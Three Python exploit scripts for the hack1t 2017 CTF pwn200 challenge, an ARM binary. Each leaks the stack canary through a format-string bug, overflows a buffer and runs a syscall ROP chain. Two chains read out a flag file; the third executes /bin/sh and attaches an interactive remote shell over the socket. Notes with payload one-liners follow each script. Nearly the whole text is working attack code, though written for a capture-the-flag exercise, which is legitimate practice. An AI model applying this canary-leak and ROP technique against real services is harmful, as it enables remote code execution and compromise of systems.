Solution to the pwn200 task of the hack1t 2017 CTF :) (I wanted to practice ROP, so I solved it by opening and reading the flag file, then writing it to stdout and exiting)
import socket
from struct import pack
def p(x):
    """Pack *x* as one 4-byte little-endian word (the target is 32-bit ARM).

    Raises struct.error if *x* does not fit in an unsigned 32-bit value.
    """
    word = pack('<L', x)
    return word
# hack1t 2017 pwn200 solver, first variant (Python 2: print statements and
# str-based sockets).
# Flow: (1) leak the stack canary through the format-string bug, (2) overflow
# the stack buffer with the leaked canary placed back in its slot so the
# canary check passes, (3) return into a chain of raw Linux/ARM syscall
# gadgets (r7 = syscall number, then "svc 0") that read()s a path into .bss,
# open()s it, read()s the file and write()s it to stdout, then exit()s.
# Defender's note: the canary is defeated by an independent read primitive,
# not by guessing; removing the format-string bug removes the leak.  The chain
# hard-codes gadget addresses, which presumably relies on the binary being
# mapped at a fixed base (no PIE) -- confirm against the target.
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))  # challenge server; the commented line is a local test box
#s.connect(("192.168.1.141", 3333))
data = s.recv(1000)  # banner
print data
# Leak stack cookie
# Format-string read primitive: "%517$p" makes the server print its 517th
# vararg slot as a pointer; per the notes string at the bottom that slot
# holds the canary.
s.send("%517$p\n")
while str.find(data, "FIGHT>") == -1:  # keep reading until the prompt, so the leak is complete
    data += s.recv(1000)
print data
# The canary is the 8 hex characters printed immediately before
# "I need your clothes".
stackcookie = str.find(data, "I need your clothes")
stackcookie = data[stackcookie-8:stackcookie]
print "COOKIE: ", stackcookie
# Overflow layout: 1024 bytes of filler up to the canary slot, the leaked
# canary (so the "cmp r2, r3" check at 0x105e0 in the notes passes), 12 more
# bytes between the canary and the saved return address, then the chain.
rop = "A"*1024
rop += p(int(stackcookie, 16))
rop += 'A'*12
BSS = 0x99ed8  # writable scratch area: receives the path, later the file contents
flagFile = "/home/pwn200/flag.txt"
# Phase 1: read(0, BSS, len(flagFile)) pulls the path that is sent after the
# chain (s.send(flagFile) below) into writable memory.  Every argument is
# loaded by a pop gadget that also pops the address of the next gadget into lr.
# read(stdin=0x0, bss=0x99ed8, len(flagFile))
rop += p(0x70068) # pop {r0, lr}; bx lr;
rop += p(0x0) # r0
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=len(flagFile); there is no direct rop, so we have to set r5 and then r2=r5
# r2 is set via r5: "mov r2, r5; mov lr, pc; bx r4" with r4 = "pop {lr}; bx lr",
# so control comes back to the next word of the chain.
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(len(flagFile)) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
# The svc gadget pops r4..sl before lr, so seven filler words follow it.
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 2: open(BSS, O_RDONLY, 0); the fd comes back in r0.
# r0 = open(BSS="/home/pwn200/flag.txt", O_RDONLY=0x0000, 0x0)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(BSS) # r0
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(0x0) # r1
# now we have to set r2=mode=0x0; there is no direct rop, so we have to set r5 and then r2=r5
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x0) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x5=open
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x5) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 3: read(fd, BSS, 0x40).  r0 is deliberately not touched here: it still
# holds the fd returned by open(), since the svc gadget's pop list excludes r0.
# read(fd=r0, BSS, 0x40)
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=count=0x40; there is no direct rop, so we have to set r5 and then r2=r5
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x40) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 4: write(1, BSS, 0x40) sends the file contents back over the socket.
# we have bss=flag, now let's write to stdout
# r0 = write(stdout=0x1, BSS, 0x40)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x1) # r0
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=count=0x40; there is no direct rop, so we have to set r5 and then r2=r5
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x40) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x4=write
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x4) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 5: exit(0) so the process terminates cleanly instead of crashing.
# call exit; we have to call the syscall with r7=0x1=exit
# exit(0x0)
rop += p(0x70068) # pop {r0, lr}; bx lr;
rop += p(0x0) # r0
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x1) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
s.send(rop)  # second input: the overflow that triggers the chain
s.send(flagFile)  # consumed by the chain's first read() into BSS
data = s.recv(1000)  # output of the chain's write(1, BSS, 0x40)
print data
s.close()
# Working notes, kept as a no-op string literal (not a module docstring).
'''
hack1t - pwn200
=================
In CHECK there is a Format String.
The Stack Canary check:
0x000105e0 cmp r2, r3 -> r2 = 0x41... r3 = 0x6688b100 = \x00\xb1\x88\x66
The stack cookie is in the 258 position
python -c "print '%llx.'*258 + '\n' + 'A'*7000" > exp
The stack cookie is in the 3829 position in our stack smashing:
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + 'BBBB'" > exp
python -c "print '%x.%x.%x.%x.%x.%x ' + '\n' + 'A'*2000" | ./pwn200
main: 0x00010604
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + '\x04\x06\x01\x00'" > exp
ROP:
Syscall:
0x0002286c: svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
'''
# Second solution; I use other ROP gadgets to set r0,r1,r2 (arguments) easier :)
import socket
from struct import pack
def p(x):
    """Pack *x* as one 4-byte little-endian word (the target is 32-bit ARM).

    Raises struct.error if *x* does not fit in an unsigned 32-bit value.
    """
    word = pack('<L', x)
    return word
# hack1t 2017 pwn200 solver, second variant (Python 2).  Same flow as the
# first variant -- leak the canary via the format string, overflow with the
# canary restored, run a syscall ROP chain (read path -> open -> read ->
# write -> exit) -- but r0..r2 are loaded in one step with a single
# "pop {r0, r1, r2, r3, r4, lr}" gadget instead of three separate pops.
# Defender's note: the canary only protects against an attacker who cannot
# read it; the format-string leak is the root cause here.  Hard-coded gadget
# addresses presumably assume a fixed load address (no PIE) -- confirm.
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))  # challenge server; the commented line is a local test box
#s.connect(("192.168.1.141", 3333))
data = s.recv(1000)  # banner
print data
# Leak stack cookie
# Format-string read primitive: "%517$p" prints the 517th vararg slot, which
# per the notes string at the bottom holds the canary.
s.send("%517$p\n")
while str.find(data, "FIGHT>") == -1:  # keep reading until the prompt, so the leak is complete
    data += s.recv(1000)
print data
# The canary is the 8 hex characters printed immediately before
# "I need your clothes".
stackcookie = str.find(data, "I need your clothes")
stackcookie = data[stackcookie-8:stackcookie]
print "COOKIE: ", stackcookie
# Overflow layout: 1024 bytes of filler, the leaked canary back in its slot,
# 12 bytes up to the saved return address, then the chain.
rop = 'A'*1024
rop += p(int(stackcookie, 16))
rop += 'A'*12
BSS = 0x99ed8  # writable scratch area: receives the path, later the file contents
flagFile = "/home/pwn200/flag.txt"
# Phase 1: read(0, BSS, len(flagFile)).  The address of "pop {lr}; bx lr" is
# first popped into r0 so that the multi-pop gadget ("mov ip, r0; pop {...};
# bx ip") branches back into the chain after loading r0..r4.
# read(stdin=0x0, bss=0x99ed8, len(flagFile))
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(0x0) # r0
rop += p(BSS) # r1
rop += p(len(flagFile)) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
# The svc gadget pops r4..sl before lr, so seven filler words follow it.
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 2: open(BSS, O_RDONLY, 0); the fd comes back in r0.
# r0 = open(BSS="/home/pwn200/flag.txt", O_RDONLY=0x0000, 0x0)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(BSS) # r0
rop += p(0x0) # r1
rop += p(0x0) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x5=open
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x5) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 3: read(fd, BSS, 0x40).  The multi-pop gadget cannot be used here
# because it would overwrite r0, which still holds the fd from open(); the
# r5 -> r2 detour leaves r0 alone.
# read(fd=r0, BSS, 0x40)
rop += p(0x70590) # lr = pop {r1, lr}; bx lr;
rop += p(BSS) # r1
# now we have to set r2=count=0x40; there is no direct rop, so we have to set r5 and then r2=r5
# we use it because we cannot lose the r0 value (fd)!!
rop += p(0x1d718) # lr = pop {r4, r5, lr}; bx lr;
rop += p(0x11100) # r4 = pop {lr}; bx lr; // then we will bx r4 !!
rop += p(0x40) # r5
rop += p(0x3786c) # lr = mov r2, r5; mov lr, pc; bx r4;
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 4: write(1, BSS, 0x40) sends the file contents back over the socket.
# we have bss=flag, now let's write to stdout
# write(stdout=0x1, BSS, 0x40)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(0x1) # r0
rop += p(BSS) # r1
rop += p(0x40) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x4=write
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x4) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 5: exit(0).  No filler words after this svc: exit never returns, so
# the gadget's trailing pops are never executed.
# call exit; we have to call the syscall with r7=0x1=exit
# exit(0x0)
rop += p(0x70068) # pop {r0, lr}; bx lr;
rop += p(0x0) # r0
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x1) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
s.send(rop)  # second input: the overflow that triggers the chain
s.send(flagFile)  # consumed by the chain's first read() into BSS
data = s.recv(1000)  # output of the chain's write(1, BSS, 0x40)
print data
s.close()
# Working notes, kept as a no-op string literal (not a module docstring).
'''
hack1t - pwn200
=================
In CHECK there is a Format String.
The Stack Canary check:
0x000105e0 cmp r2, r3 -> r2 = 0x41... r3 = 0x6688b100 = \x00\xb1\x88\x66
The stack cookie is in the 258 position
python -c "print '%llx.'*258 + '\n' + 'A'*7000" > exp
The stack cookie is in the 3829 position in our stack smashing:
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + 'BBBB'" > exp
python -c "print '%x.%x.%x.%x.%x.%x ' + '\n' + 'A'*2000" | ./pwn200
main: 0x00010604
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + '\x04\x06\x01\x00'" > exp
ROP:
Syscall:
0x0002286c: svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
'''
import socket
from struct import pack
import telnetlib
def p(x):
    """Pack *x* as one 4-byte little-endian word (the target is 32-bit ARM).

    Raises struct.error if *x* does not fit in an unsigned 32-bit value.
    """
    word = pack('<L', x)
    return word
# hack1t 2017 pwn200 solver, third variant (Python 2).  Same canary leak and
# overflow as the other two variants, but the chain is shorter: it read()s a
# path into .bss and then execve()s it, after which the socket is handed to
# telnetlib for interactive use.
# Defender's note: the canary is bypassed because the format-string bug lets
# its value be read first; fixing that bug removes the leak.  The hard-coded
# gadget addresses presumably assume a fixed load address (no PIE) -- confirm.
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
s.connect(("165.227.98.55", 3333))  # challenge server; the commented line is a local test box
#s.connect(("192.168.1.141", 3333))
data = s.recv(1000)  # banner
print data
# Leak stack cookie
# Format-string read primitive: "%517$p" prints the 517th vararg slot, which
# per the notes string at the bottom holds the canary.
s.send("%517$p\n")
while str.find(data, "FIGHT>") == -1:  # keep reading until the prompt, so the leak is complete
    data += s.recv(1000)
print data
# The canary is the 8 hex characters printed immediately before
# "I need your clothes".
stackcookie = str.find(data, "I need your clothes")
stackcookie = data[stackcookie-8:stackcookie]
print "COOKIE: ", stackcookie
# Overflow layout: 1024 bytes of filler, the leaked canary back in its slot,
# 12 bytes up to the saved return address, then the chain.
rop = 'A'*1024
rop += p(int(stackcookie, 16))
rop += 'A'*12
BSS = 0x99ed8  # writable scratch area that receives the path
filepath = "/bin/sh"
# Phase 1: read(0, BSS, len(filepath)) pulls the path sent after the chain
# (s.send(filepath) below) into writable memory.  The address of
# "pop {lr}; bx lr" is first popped into r0 so the multi-pop gadget
# ("mov ip, r0; pop {...}; bx ip") branches back into the chain.
# read(stdin=0x0, bss=0x99ed8, len(filepath))
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(0x0) # r0
rop += p(BSS) # r1
rop += p(len(filepath)) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0x3=read
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0x3) # r7
# The svc gadget pops r4..sl before lr, so seven filler words follow it.
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
rop += p(0x0) # r4
rop += p(0x0) # r5
rop += p(0x0) # r6
rop += p(0x0) # r7
rop += p(0x0) # r8
rop += p(0x0) # sb
rop += p(0x0) # sl
# Phase 2: execve(BSS, 0, 0) with syscall number 0xb.  No filler words after
# this svc: on success execve does not return.
# execve(BSS, args=0x0, envp=0x0)
rop += p(0x70068) # lr = pop {r0, lr}; bx lr;
rop += p(0x11100) # r0 = pop {lr}; bx lr; then we will do ip=r0 ; bx ip;
rop += p(0x60ce0) # mov ip, r0; pop {r0, r1, r2, r3, r4, lr}; bx ip;
rop += p(BSS) # r0
rop += p(0x0) # r1
rop += p(0x0) # r2
rop += p(0x0) # r3
rop += p(0x0) # r4
rop += p(0x0) # lr (doesn't matter, we bx ip, and then pop lr;bx lr)
# r0,r1,r2 set; we have to call the syscall with r7=0xb=execve
rop += p(0x19d20) # lr = pop {r7, lr}; bx lr;
rop += p(0xb) # r7
rop += p(0x2286c) # svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
s.send(rop)  # second input: the overflow that triggers the chain
s.send(filepath)  # consumed by the chain's first read() into BSS
# Reuse the already-connected socket as a Telnet session so the remote
# process's stdin/stdout are tied to the local terminal.
t = telnetlib.Telnet()
t.sock = s
t.interact()
# Working notes, kept as a no-op string literal (not a module docstring).
'''
hack1t - pwn200
=================
In CHECK there is a Format String.
The Stack Canary check:
0x000105e0 cmp r2, r3 -> r2 = 0x41... r3 = 0x6688b100 = \x00\xb1\x88\x66
The stack cookie is in the 258 position
python -c "print '%llx.'*258 + '\n' + 'A'*7000" > exp
The stack cookie is in the 3829 position in our stack smashing:
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + 'BBBB'" > exp
python -c "print '%x.%x.%x.%x.%x.%x ' + '\n' + 'A'*2000" | ./pwn200
main: 0x00010604
python -c "print '%llx.'*258 + '\n' + 'A'*3829 + 'CCCC' + 'A'*12 + '\x04\x06\x01\x00'" > exp
ROP:
Syscall:
0x0002286c: svc 0; pop {r4, r5, r6, r7, r8, sb, sl, lr}; bx lr;
'''